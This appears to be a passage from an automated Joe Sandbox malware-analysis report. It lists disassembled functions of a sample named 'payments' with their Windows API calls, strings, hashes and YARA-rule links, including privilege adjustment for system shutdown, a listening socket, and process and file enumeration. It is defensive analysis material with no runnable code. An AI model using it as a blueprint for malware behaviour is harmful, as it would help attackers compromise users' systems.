                                                                                                                          • Opcode ID: 7519f10dee82c55ef7febe6ba8f9d18d84beb217d4e6a8294f40cc084dcd92ed
                                                                                                                          • Instruction ID: 97bd8b093c101ce4ab1a61f50d15d9e2ad8942890514876941b8ba250b63aaf3
                                                                                                                          • Opcode Fuzzy Hash: 7519f10dee82c55ef7febe6ba8f9d18d84beb217d4e6a8294f40cc084dcd92ed
                                                                                                                          • Instruction Fuzzy Hash: FD218D31300215AFDB01AF69DC49BAD77A9FF14761F00801AF91ADB3A1DF34EA019B64
                                                                                                                          Function 00CEC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CC9ABF: CLSIDFromProgID.OLE32 ref: 00CC9ADC
                                                                                                                            • Part of subcall function 00CC9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00CC9AF7
                                                                                                                            • Part of subcall function 00CC9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00CC9B05
                                                                                                                            • Part of subcall function 00CC9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00CC9B15
                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00CEC235
                                                                                                                          • _memset.LIBCMT ref: 00CEC242
                                                                                                                          • _memset.LIBCMT ref: 00CEC360
                                                                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00CEC38C
                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00CEC397
                                                                                                                          Strings
                                                                                                                          • NULL Pointer assignment, xrefs: 00CEC3E5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                          • String ID: NULL Pointer assignment
                                                                                                                          • API String ID: 1300414916-2785691316
                                                                                                                          • Opcode ID: 82b2ae9a254d1f899022e62cfb9112a00d605e789480eebf96a3cbe131cde9bf
                                                                                                                          • Instruction ID: bc4b926804f34068e45e9f9122e1f6fcf3f7644854956d13f4f5e060058e64fc
                                                                                                                          • Opcode Fuzzy Hash: 82b2ae9a254d1f899022e62cfb9112a00d605e789480eebf96a3cbe131cde9bf
                                                                                                                          • Instruction Fuzzy Hash: 01914B71D00218ABDF10DF95DC95EEEBBB9EF08310F10811AF515A7291EB709A46DFA0
                                                                                                                          Function 00CD79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CCB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CCB180
                                                                                                                            • Part of subcall function 00CCB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CCB1AD
                                                                                                                            • Part of subcall function 00CCB134: GetLastError.KERNEL32 ref: 00CCB1BA
                                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00CD7A0F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                          • String ID: $@$SeShutdownPrivilege
                                                                                                                          • API String ID: 2234035333-194228
                                                                                                                          • Opcode ID: 4569e61f999c14182ad3c3578301ef0e8a3a2db648fe6d5cae75ae07374f0644
                                                                                                                          • Instruction ID: dfe7ca9b5dc92ba7bb76b20e644f7847fe178b9435bd65545a1f543ea107ba08
                                                                                                                          • Opcode Fuzzy Hash: 4569e61f999c14182ad3c3578301ef0e8a3a2db648fe6d5cae75ae07374f0644
                                                                                                                          • Instruction Fuzzy Hash: 8B01D8716583216AF72816A4CC5ABBF73589B00344F14661AFF17E22C2FA705F00A1B0
                                                                                                                          Function 00CE8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00CE8CA8
                                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CE8CB7
                                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00CE8CD3
                                                                                                                          • listen.WSOCK32(00000000,00000005), ref: 00CE8CE2
                                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CE8CFC
                                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00CE8D10
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279440585-0
                                                                                                                          • Opcode ID: b6024116f26054511a1a94c9326c57f98f178689a115ac752076ba3585374db4
                                                                                                                          • Instruction ID: 92e61533550099dfe9901afc52685408e039ba1f85ee9c7e256f7ecf1dc981f1
                                                                                                                          • Opcode Fuzzy Hash: b6024116f26054511a1a94c9326c57f98f178689a115ac752076ba3585374db4
                                                                                                                          • Instruction Fuzzy Hash: 1821A231600601AFCB10AF68CD85B6E77A9EF49324F148158F91BE73D2CB30AE46DB61
                                                                                                                          Function 00CD6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00CD6554
                                                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00CD6564
                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00CD6583
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CD65A7
                                                                                                                          • _wcscat.LIBCMT ref: 00CD65BA
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00CD65F9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1605983538-0
                                                                                                                          • Opcode ID: c8712346fcdb5220b13e4103d5014d7e479d982955c252fdc569365846ef6658
                                                                                                                          • Instruction ID: 9b60e83fe7fb115462ecfedf81f64885d5743c474390b876d6874d9d2f50796f
                                                                                                                          • Opcode Fuzzy Hash: c8712346fcdb5220b13e4103d5014d7e479d982955c252fdc569365846ef6658
                                                                                                                          • Instruction Fuzzy Hash: 7F215371900218ABDF11ABA4DC89BEEB7FDAB44300F5044E6E605D7241EB719FC5CB60
                                                                                                                          Function 00CE923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CEA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00CEA84E
                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00CE9296
                                                                                                                          • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00CE92B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastinet_addrsocket
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4170576061-0
                                                                                                                          • Opcode ID: 96366228619ee7f1561840f2e52191584d11b51f691b41b4ac66194fdfab3751
                                                                                                                          • Instruction ID: 4b1acca1a47e1f8a8a7d23efdba27c4ce7dbc93510a7f6034dd31b9c181ac3d8
                                                                                                                          • Opcode Fuzzy Hash: 96366228619ee7f1561840f2e52191584d11b51f691b41b4ac66194fdfab3751
                                                                                                                          • Instruction Fuzzy Hash: C241D270600201AFDB10AF68C886E7E77EDEF45728F04844CF956AB3D2DB749D019BA1
                                                                                                                          Function 00CDEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00CDEB8A
                                                                                                                          • _wcscmp.LIBCMT ref: 00CDEBBA
                                                                                                                          • _wcscmp.LIBCMT ref: 00CDEBCF
                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00CDEBE0
                                                                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00CDEC0E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2387731787-0
                                                                                                                          • Opcode ID: eb437ca68f192c8b4664e1ea20b4e6e66280530159c42a0548160ab5e9f6f1f1
                                                                                                                          • Instruction ID: 4f9a17b5f77274dc39ffdb8506641e308f2e71a941b325327663e7a396efe788
                                                                                                                          • Opcode Fuzzy Hash: eb437ca68f192c8b4664e1ea20b4e6e66280530159c42a0548160ab5e9f6f1f1
                                                                                                                          • Instruction Fuzzy Hash: 4241B0356047029FC718EF68C491AA9B3E4FF49324F10455EEA6ACB3A1DB31BA45CB91
                                                                                                                          Function 00CF8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 292994002-0
                                                                                                                          • Opcode ID: 89a71b44ef3c2ed82ac1eb30dbd4116cfca304f4a637105252fa090af2585bfa
                                                                                                                          • Instruction ID: dfd0b4d4f1d30fcc46b0f7fdf7633b56be269962ecc1293ba1fc36c4698a1a18
                                                                                                                          • Opcode Fuzzy Hash: 89a71b44ef3c2ed82ac1eb30dbd4116cfca304f4a637105252fa090af2585bfa
                                                                                                                          • Instruction Fuzzy Hash: FF1190313002197BEB212F269C44ABE7B9DEF45760B048529FA49D7281CF34990786A6
                                                                                                                          Function 00C99B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                          • API String ID: 0-1546025612
                                                                                                                          • Opcode ID: fe0cfc077b31826eda42b727217e63b372db6f5c9b92a65d196881d457f60a4d
                                                                                                                          • Instruction ID: 530bde14b9c3be542e82bd0d3ea1ce614476ae25b15bbe80f90ecb32b0811e48
                                                                                                                          • Opcode Fuzzy Hash: fe0cfc077b31826eda42b727217e63b372db6f5c9b92a65d196881d457f60a4d
                                                                                                                          • Instruction Fuzzy Hash: 65926C71E0021ADBDF24CF59D8847EDB7B1FB54314F14819AE81AAB280DB719EC1DBA1
                                                                                                                          Function 00CAE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00CAE014,76F90AE0,00CADEF1,00D2DC38,?,?), ref: 00CAE02C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00CAE03E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                          • API String ID: 2574300362-192647395
                                                                                                                          • Opcode ID: 514af384f1537359704126e6938c728ad507d36bf91817e7d85cce60da69813e
                                                                                                                          • Instruction ID: eef9c30d84fae12221142f1f9e5751a78a11eed33e0e9b550249156c015b2a02
                                                                                                                          • Opcode Fuzzy Hash: 514af384f1537359704126e6938c728ad507d36bf91817e7d85cce60da69813e
                                                                                                                          • Instruction Fuzzy Hash: 67D0C770500723BFD7355F65EC086627AE5AB05715F188429F495D2250DBB4D9C586B0
                                                                                                                          Function 00CD13CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00CD13DC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen
                                                                                                                          • String ID: ($|
                                                                                                                          • API String ID: 1659193697-1631851259
                                                                                                                          • Opcode ID: 8df3ca96a6b0131ba4e81094b0127a05bdb8bd4c1c642c3d1231b6ac5cf7eecb
                                                                                                                          • Instruction ID: 605b1456b14bab13147607af240f2cda22af4c21a0b8f49c53fccb17bfc311e6
                                                                                                                          • Opcode Fuzzy Hash: 8df3ca96a6b0131ba4e81094b0127a05bdb8bd4c1c642c3d1231b6ac5cf7eecb
                                                                                                                          • Instruction Fuzzy Hash: 9E321775A00705AFC728CF69D49096AB7F0FF48320B15C56EE9AADB3A1E770E941CB44
                                                                                                                          Function 00CAB11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00CAB22F
                                                                                                                            • Part of subcall function 00CAB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00CAB5A5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Proc$LongWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2749884682-0
                                                                                                                          • Opcode ID: f0eab7dbdfc5cdd79ae8565d369e3a2b421dcf92bc43f062251652b7b9644166
                                                                                                                          • Instruction ID: e0a4f4887ec29d428571055bb81d528cfc4a705b0f9d2d31f45b9db5511bcfa7
                                                                                                                          • Opcode Fuzzy Hash: f0eab7dbdfc5cdd79ae8565d369e3a2b421dcf92bc43f062251652b7b9644166
                                                                                                                          • Instruction Fuzzy Hash: FCA126B411410BBADB286A2A5C88FBF6A6CEF47349B144A1EF906D21D3DB15DD01A272
                                                                                                                          Function 00CE4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00CE43BF,00000000), ref: 00CE4FA6
                                                                                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00CE4FD2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 599397726-0
                                                                                                                          • Opcode ID: 411132a23c200be83978e6212c28145119db2a764fc53a219e6df354d1921c7e
                                                                                                                          • Instruction ID: 361dd779f931697746a5bbc83bde52060a43ca97839be4d100d9cbfa478aef37
                                                                                                                          • Opcode Fuzzy Hash: 411132a23c200be83978e6212c28145119db2a764fc53a219e6df354d1921c7e
                                                                                                                          • Instruction Fuzzy Hash: B541D571904749BFEB24DEC6CC85EBBB7BDEB40758F10406AF205A6181DA719E41A6A0
                                                                                                                          Function 00CDE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00CDE20D
                                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00CDE267
                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00CDE2B4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1682464887-0
                                                                                                                          • Opcode ID: 974079e3b512952a5572c22c1c0ef4b524ffae3cf7746c0d76e5a7357ef25b49
                                                                                                                          • Instruction ID: 893b08e196b3fc8d1afc151417c67ad91e80d9e8e248cb672aa6af36b9cc65c6
                                                                                                                          • Opcode Fuzzy Hash: 974079e3b512952a5572c22c1c0ef4b524ffae3cf7746c0d76e5a7357ef25b49
                                                                                                                          • Instruction Fuzzy Hash: BA216D35A00218EFCB00EFA5D885AEDBBB9FF49314F0584AAE905EB351DB319905CB60
                                                                                                                          Function 00CCB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAF4EA: std::exception::exception.LIBCMT ref: 00CAF51E
                                                                                                                            • Part of subcall function 00CAF4EA: __CxxThrowException@8.LIBCMT ref: 00CAF533
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CCB180
                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CCB1AD
                                                                                                                          • GetLastError.KERNEL32 ref: 00CCB1BA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1922334811-0
                                                                                                                          • Opcode ID: 1fe0ab1cc4f117e39d23155d3c819859bee1ecd76420214924dbd47d2927cd10
                                                                                                                          • Instruction ID: ff71044630caebb5eeddf16ca3000c2e5ebf509bebb319d4dab0dfb92b0a6847
                                                                                                                          • Opcode Fuzzy Hash: 1fe0ab1cc4f117e39d23155d3c819859bee1ecd76420214924dbd47d2927cd10
